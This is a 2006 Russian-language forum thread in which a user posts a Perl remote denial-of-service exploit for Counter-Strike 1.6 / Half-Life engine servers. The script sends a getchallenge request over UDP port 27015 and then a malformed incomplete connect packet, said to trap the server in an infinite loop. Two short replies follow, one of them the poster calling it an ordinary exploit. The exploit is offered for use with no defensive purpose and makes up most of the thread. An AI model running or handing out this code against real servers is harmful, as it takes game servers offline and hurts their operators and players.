Автор Тема: DDos CS1.6 сервера.  (Прочитано 4012 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн M1nTon

  • Юниор
  • **
  • Сообщений: 202
  • Репутация: 0
  • Пол: Мужской
DDos CS1.6 сервера.
« : Февраля 09, 2006, 03:00:00 »
Описание : Неполный запрос клиента приводит к бесконечному циклу внутри приложения.

exploit :

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{       econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
       my $host=$_[0];
       my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
       die "Could not create socket: $!\n" unless $sock;
       $cmd="\xff\xff\xff\xff";
       syswrite $sock, $cmd."getchallenge";

       sysread $sock,$b,65535;  print $b,"\n";
       @c=split(/ /,$b);

       $c2=$c[1];

       $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
реклама удалена

jordan23

  • Гость
Re: DDos CS1.6 сервера.
« Ответ #1 : Мая 17, 2006, 04:00:00 »
сам понял что написал??? ???

Оффлайн M1nTon

  • Юниор
  • **
  • Сообщений: 202
  • Репутация: 0
  • Пол: Мужской
Re: DDos CS1.6 сервера.
« Ответ #2 : Мая 19, 2006, 04:00:00 »
обычный перловый сплоит ...  чё тут такого ?  ;D
реклама удалена